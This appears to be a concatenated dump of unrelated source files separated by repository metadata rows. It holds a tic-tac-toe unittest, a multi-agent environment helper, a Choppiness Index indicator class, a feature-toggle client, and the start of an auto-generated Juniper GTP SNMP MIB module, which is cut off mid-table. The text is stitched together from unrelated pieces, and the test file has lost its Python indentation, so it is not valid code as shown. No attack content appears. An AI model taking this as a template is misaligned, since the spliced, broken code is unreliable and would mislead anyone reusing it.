] | null | null | null | tests/test_play_turn.py | Avashist1998/tictactoe-abhay | e2a023234b4c903879d2d819997a579eb9e649d0 | [
"MIT"
] | null | null | null | import unittest
from tic_tac_toe.TicTacToe import TicTacToe
def board_starter(spot:int):
    """Create a fresh TicTacToe game, play *spot*, and return (game, status)."""
    fresh_game = TicTacToe()
    outcome = fresh_game.play_turn(spot)
    return fresh_game, outcome
class test_play_turn(unittest.TestCase):
def test_perfect_case(self):
game, status = board_starter(1)
board = '|x|2|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(2)
board = '|1|x|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(3)
board = '|1|2|x|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(4)
board = '|1|2|3|\n-------\n|x|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(5)
board = '|1|2|3|\n-------\n|4|x|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(6)
board = '|1|2|3|\n-------\n|4|5|x|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(7)
board = '|1|2|3|\n-------\n|4|5|6|\n-------\n|x|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(8)
board = '|1|2|3|\n-------\n|4|5|6|\n-------\n|7|x|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(9)
board = '|1|2|3|\n-------\n|4|5|6|\n-------\n|7|8|x|\n'
self.assertEqual(game.get_board(), board)
def test_over_lap_case(self):
game, status = board_starter(1)
board = '|x|2|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
status = game.play_turn(1)
self.assertEqual(-1, status)
self.assertEqual(board, game.get_board())
game, status = board_starter(2)
board = '|1|x|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
status = game.play_turn(2)
self.assertEqual(-1, status)
self.assertEqual(board, game.get_board())
game, status = board_starter(3)
board = '|1|2|x|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
status = game.play_turn(3)
self.assertEqual(-1, status)
self.assertEqual(board, game.get_board())
def test_invalid_case(self):
game = TicTacToe()
status = game.play_turn(-1)
self.assertEqual(-1,status)
game = TicTacToe()
status = game.play_turn()
self.assertEqual(-1,status)
status = game.play_turn(0)
self.assertEqual(-1,status)
if __name__ == "__main__":
unittest.main() | 40.671429 | 63 | 0.545838 | 2,627 | 0.922726 | 0 | 0 | 0 | 0 | 0 | 0 | 574 | 0.201616 |
5e2a1a3b81768dc01ada5c03b830c68d66cb3bb2 | 863 | py | Python | p3_collab-compet/envs.py | albimc/deep-reinforcement-learning | e11a6c9d4c8991cf229e686b645ae22ec4cff4f5 | [
"MIT"
] | null | null | null | p3_collab-compet/envs.py | albimc/deep-reinforcement-learning | e11a6c9d4c8991cf229e686b645ae22ec4cff4f5 | [
"MIT"
] | null | null | null | p3_collab-compet/envs.py | albimc/deep-reinforcement-learning | e11a6c9d4c8991cf229e686b645ae22ec4cff4f5 | [
"MIT"
] | null | null | null | from env_wrapper import SubprocVecEnv, DummyVecEnv
import numpy as np
import multiagent.scenarios as scenarios
from multiagent.environment import MultiAgentEnv
def make_parallel_env(n_rollout_threads, seed=1):
    """Spawn *n_rollout_threads* subprocess-backed 'simple_adversary' envs.

    Each worker derives its own seed from *seed* and its rank, so rollouts
    are decorrelated yet reproducible.
    """
    def thunk_for(rank):
        worker_seed = seed + rank * 1000
        def init_env():
            env = make_env("simple_adversary")
            env.seed(worker_seed)
            np.random.seed(worker_seed)
            return env
        return init_env
    thunks = [thunk_for(rank) for rank in range(n_rollout_threads)]
    return SubprocVecEnv(thunks)
def make_env(scenario_name, benchmark=False):
    """Build a MultiAgentEnv from the named multiagent scenario module.

    NOTE(review): *benchmark* is currently unused by this implementation --
    confirm whether benchmark data collection was meant to be wired up.
    """
    scenario = scenarios.load(scenario_name + ".py").Scenario()
    world = scenario.make_world()
    return MultiAgentEnv(world, scenario.reset_world,
                         scenario.reward, scenario.observation)
| 30.821429 | 91 | 0.695249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 108 | 0.125145 |
5e2b2f0e5c9cdd14dd3e3052e5392fdfa1eb0061 | 1,115 | py | Python | talipp/indicators/CHOP.py | solocarrie/talipp | a35bbc33444c56683d4e26439f4878e92b937d7f | [
"MIT"
] | 54 | 2020-11-19T02:27:04.000Z | 2022-02-22T06:31:05.000Z | talipp/indicators/CHOP.py | justin-pierce/talipp | f5296381e3f4270b7743694e2ab5a0da301bdaf3 | [
"MIT"
] | 24 | 2020-11-01T17:56:28.000Z | 2021-09-15T18:40:04.000Z | talipp/indicators/CHOP.py | justin-pierce/talipp | f5296381e3f4270b7743694e2ab5a0da301bdaf3 | [
"MIT"
] | 14 | 2020-12-10T22:43:37.000Z | 2022-01-15T22:23:42.000Z | from math import log10
from typing import List, Any
from talipp.indicators.Indicator import Indicator
from talipp.indicators.ATR import ATR
from talipp.ohlcv import OHLCV
class CHOP(Indicator):
    """
    Choppiness Index over a sliding window of ``period`` candles.

    Output: one value per input OHLCV candle -- a float computed from the
    formula below, or None while fewer than ``period`` candles are
    available, or a repeat of the previous value for a degenerate flat
    window.  (A previous docstring said "OHLCV objects"; the code below
    only ever returns floats/None.)
    """
    def __init__(self, period: int, input_values: List[OHLCV] = None):
        # NOTE(review): annotation should be Optional[List[OHLCV]] since the
        # default is None; left as-is because `Optional` is not imported.
        super().__init__()
        self.period = period
        # ATR with period 1 degenerates to each candle's raw true range.
        self.atr = ATR(1)
        self.add_sub_indicator(self.atr)
        self.initialize(input_values)
    def _calculate_new_value(self) -> Any:
        # Not enough candles yet to span a full look-back window.
        if len(self.atr) < self.period or len(self.input_values) < self.period:
            return None
        # Highest high and lowest low over the look-back window.
        max_high = max(self.input_values[-self.period:], key = lambda x: x.high).high
        min_low = min(self.input_values[-self.period:], key = lambda x: x.low).low
        if max_high != min_low:
            # 100 * log10(sum(TR) / range) / log10(period)
            return 100.0 * log10(sum(self.atr[-self.period:]) / (max_high - min_low) ) / log10(self.period)
        else:
            # Flat window (zero range): repeat the previous value, if any.
            if len(self.output_values) > 0:
                return self.output_values[-1]
            else:
return None | 28.589744 | 107 | 0.622422 | 941 | 0.843946 | 0 | 0 | 0 | 0 | 0 | 0 | 69 | 0.061883 |
5e2b522b922e568a38309ed95a9002c2eb99209a | 2,177 | py | Python | unleash_client/clients.py | rarruda/unleash-client-python | 2f64bb2eab92eb9b99b4bef54c206d7672c6380c | [
"Apache-2.0"
] | 2 | 2018-10-23T10:07:50.000Z | 2018-10-30T02:37:30.000Z | unleash_client/clients.py | rarruda/unleash-client-python | 2f64bb2eab92eb9b99b4bef54c206d7672c6380c | [
"Apache-2.0"
] | 1 | 2018-09-25T17:29:40.000Z | 2018-09-25T17:29:40.000Z | unleash_client/clients.py | rarruda/unleash-client-python | 2f64bb2eab92eb9b99b4bef54c206d7672c6380c | [
"Apache-2.0"
] | null | null | null | import time
import logging
from urllib.parse import urljoin
from .strategy import DEFAULT_STRATEGIES
from .io import UrlFetcher, Reporter
from .features import Feature
log = logging.getLogger(__name__)
def name_instance():
    """Default instance identifier: '<hostname>:<pid>'."""
    # Imported lazily so module import stays cheap for callers that supply
    # their own instance_id.
    import os
    import socket
    return f"{socket.gethostname()}:{os.getpid()}"
class Client:
    """Unleash-style feature-toggle client.

    Fetches feature definitions from the server (via an injectable fetcher),
    evaluates activation strategies locally, and optionally reports usage
    metrics after every evaluation.
    """

    def __init__(
        self,
        url='http://localhost:4242',
        headers=None,
        app_name='anon-app',
        instance_id=None,
        refresh_interval=60,
        metrics_interval=60,
        disable_metrics=False,
        strategies=DEFAULT_STRATEGIES,
        clock=time.time,
        fetch=None,
    ):
        """Create a client.

        fetch: optional callable returning the definitions payload; when
        None a UrlFetcher polling the server every *refresh_interval*
        seconds is used.  instance_id defaults to '<hostname>:<pid>'.
        """
        self.url = url
        self._headers = headers
        self.app_name = app_name
        self.instance_id = instance_id or name_instance()
        self.strategies = strategies
        features_url = urljoin(url, '/api/client/features')
        # Allow a custom fetcher to be injected (useful in tests).
        self.fetch = fetch or UrlFetcher(features_url, refresh_interval, self._headers)
        self.defs = {}      # last raw definitions payload seen
        self.features = {}  # name -> Feature, rebuilt whenever defs change
        if not disable_metrics:
            self.reporter = Reporter(
                self,
                urljoin(url, '/api/client/metrics'),
                metrics_interval,
                self._headers,
                clock=clock,
            )
        else:
            # No-op stand-in so call sites never have to branch.
            self.reporter = lambda *al: None

    def get(self, name):
        """Return the Feature for *name*, or an always-False callable."""
        d = self.fetch()
        # Identity check: only rebuild the Feature map when the fetcher
        # hands back a new definitions object.
        if d is not self.defs:
            self.defs = d
            ts = [Feature(self.strategies, f) for f in d.get('features', [])]
            self.features = {t.feature['name']: t for t in ts}
        return self.features.get(name, lambda *al, **kw: False)

    def enabled(self, name, context=None):
        """Evaluate toggle *name* against *context*, recording the call.

        *context* defaults to a fresh empty dict.  (The previous default
        was a shared mutable ``{}``; any strategy mutating it would have
        leaked state across calls -- the classic mutable-default bug.)
        Non-dict contexts are ignored with an error log, as before.
        """
        if context is None:
            context = {}
        elif not isinstance(context, dict):
            log.error("Ignoring context parameter, as it is not a dictionary: %r", context)
            context = {}
        try:
            return self.get(name)(context)
        finally:
            self.reporter()

    def close(self):
        """Flush any pending metrics."""
        self.reporter()
class DummyClient:
    """Inert client: every feature reads as disabled, close() is a no-op."""

    @staticmethod
    def enabled(name, context):
        """Report any feature as disabled, ignoring the context."""
        return False

    @staticmethod
    def close():
        """Nothing to release."""
        return None
| 27.556962 | 91 | 0.57051 | 1,854 | 0.851631 | 0 | 0 | 0 | 0 | 0 | 0 | 158 | 0.072577 |
5e2c05aeee32a3c0a0b12b655a2e82559e46b7c9 | 269,482 | py | Python | pysnmp-with-texts/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:00:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion")
InetAddressPrefixLength, InetPortNumber, InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddressPrefixLength", "InetPortNumber", "InetAddress", "InetAddressType")
Ipv6AddressIfIdentifier, Ipv6AddressPrefix, Ipv6Address = mibBuilder.importSymbols("IPV6-TC", "Ipv6AddressIfIdentifier", "Ipv6AddressPrefix", "Ipv6Address")
jnxMobileGatewaySgw, = mibBuilder.importSymbols("JUNIPER-MBG-SMI", "jnxMobileGatewaySgw")
EnabledStatus, = mibBuilder.importSymbols("JUNIPER-MIMSTP-MIB", "EnabledStatus")
jnxMbgGwName, jnxMbgGwIndex = mibBuilder.importSymbols("JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwName", "jnxMbgGwIndex")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, Counter64, Bits, TimeTicks, Integer32, iso, ObjectIdentity, MibIdentifier, Unsigned32, Gauge32, IpAddress, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "Counter64", "Bits", "TimeTicks", "Integer32", "iso", "ObjectIdentity", "MibIdentifier", "Unsigned32", "Gauge32", "IpAddress", "NotificationType")
TextualConvention, RowStatus, TruthValue, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "RowStatus", "TruthValue", "DisplayString")
jnxMbgSgwGtpMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2))
jnxMbgSgwGtpMib.setRevisions(('2011-09-21 12:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setRevisionsDescriptions(('Initial version',))
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setLastUpdated('201109211200Z')
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setContactInfo('Juniper Technical Assistance Center Juniper Networks, Inc. 1194 N. Mathilda Avenue Sunnyvale, CA 94089 E-mail: support@juniper.net')
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setDescription('This module defines some sample objects pertaining to GTP protocol.')
jnxMbgSgwGtpNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 0))
jnxMbgSgwGtpObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1))
jnxMbgSgwGtpCGlbStatsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2), )
if mibBuilder.loadTexts: jnxMbgSgwGtpCGlbStatsTable.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpCGlbStatsTable.setDescription('Each entry corresponds to a gateway level GTP Control statistic.')
jnxMbgSgwGtpGlbStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1), ).setIndexNames((0, "JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwIndex"))
if mibBuilder.loadTexts: jnxMbgSgwGtpGlbStatsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpGlbStatsEntry.setDescription('A specification of the GTP gateway level control Statistics.')
jnxMbgSgwRxPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRxPacketsDropped.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRxPacketsDropped.setDescription('Number of Received Packets Dropped.')
jnxMbgSgwPacketAllocFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPacketAllocFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPacketAllocFail.setDescription('Number of Packet allocation failures.')
jnxMbgSgwPacketSendFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPacketSendFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPacketSendFail.setDescription('Number of Packet Send failures.')
jnxMbgSgwIPVerErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIPVerErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIPVerErrRx.setDescription('Number of IP Version Error Packets Received.')
jnxMbgSgwIPProtoErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIPProtoErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIPProtoErrRx.setDescription('Number of IP protocol Error packets Received.')
jnxMbgSgwGTPPortErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGTPPortErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGTPPortErrRx.setDescription('Number of Port Error Packets Received.')
jnxMbgSgwGTPUnknVerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGTPUnknVerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGTPUnknVerRx.setDescription('Number of Unknown Version Packets Received.')
jnxMbgSgwPcktLenErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPcktLenErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPcktLenErrRx.setDescription('Number of Packet Length Error Packets Received.')
jnxMbgSgwUnknMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUnknMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUnknMsgRx.setDescription('Number of Unknown Messages Received.')
jnxMbgSgwProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwProtocolErrRx.setDescription('Number of GTPv2 Protocol Errors Received.')
jnxMbgSgwUnSupportedMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUnSupportedMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUnSupportedMsgRx.setDescription('Number of GTPv2 Unsupported Messages received.')
jnxMbgSgwT3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwT3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwT3RespTmrExpRx.setDescription('Number of GTP V2 T3 timer expiries Received.')
jnxMbgSgwV2NumMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgRx.setDescription('Number of GTPv2 messages received.')
jnxMbgSgwV2NumMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgTx.setDescription('Number of V2 messages sent.')
jnxMbgSgwV2NumBytesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesRx.setDescription('Number of GTPv2 bytes received.')
jnxMbgSgwV2NumBytesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesTx.setDescription('Number of V2 bytes sent.')
jnxMbgSgwV2EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 19), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqRx.setDescription('Number of GTP V2 Echo Request received.')
jnxMbgSgwV2EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 20), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqTx.setDescription('Number of GTP V2 Echo Request Sent.')
jnxMbgSgwV2EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespRx.setDescription('Number of GTP V2 Echo Response received.')
jnxMbgSgwV2EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespTx.setDescription('Number of GTP V2 Echo Response Sent.')
jnxMbgSgwV2VerNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupRx.setDescription('Number of GTP V2 Version Not supported messages received')
jnxMbgSgwV2VerNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupTx.setDescription('Number of GTP V2 version not supported messages sent.')
jnxMbgSgwCreateSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqRx.setDescription('Number of GTP V2 Create Session Requests received.')
jnxMbgSgwCreateSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqTx.setDescription('Number of GTP V2 Create Session Requests Sent.')
jnxMbgSgwCreateSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 27), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspRx.setDescription('Number of GTP V2 Create Session Responses received.')
jnxMbgSgwCreateSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspTx.setDescription('Number of GTP V2 Create Session Responses Sent.')
jnxMbgSgwModBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrReqRx.setDescription('Number of GTP V2 Modify Bearer Requests received.')
jnxMbgSgwModBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrReqTx.setDescription('Number of GTP V2 Modify Bearer Requests Sent.')
jnxMbgSgwModBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrRspRx.setDescription('Number of GTP V2 Modify Bearer Responses received.')
jnxMbgSgwModBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrRspTx.setDescription('Number of GTP V2 Modify Bearer Responses Sent.')
jnxMbgSgwDelSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqRx.setDescription('Number of GTP V2 Delete Session Requests received.')
jnxMbgSgwDelSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqTx.setDescription('Number of GTP V2 Delete Session Requests Sent.')
jnxMbgSgwDelSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspRx.setDescription('Number of GTP V2 Delete Session Responses received.')
jnxMbgSgwDelSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspTx.setDescription('Number of GTP V2 Delete Session Responses Sent.')
jnxMbgSgwCrtBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 37), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqRx.setDescription('Number of GTP V2 Create Bearer Requests received.')
jnxMbgSgwCrtBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 38), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqTx.setDescription('Number of GTP V2 Create Bearer Requests Sent.')
jnxMbgSgwCrtBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 39), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspRx.setDescription('Number of GTP V2 Create Bearer Response received.')
jnxMbgSgwCrtBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 40), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspTx.setDescription('Number of GTP V2 Create Bearer Response Sent.')
jnxMbgSgwUpdBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 41), Counter64()).setMaxAccess("readonly")
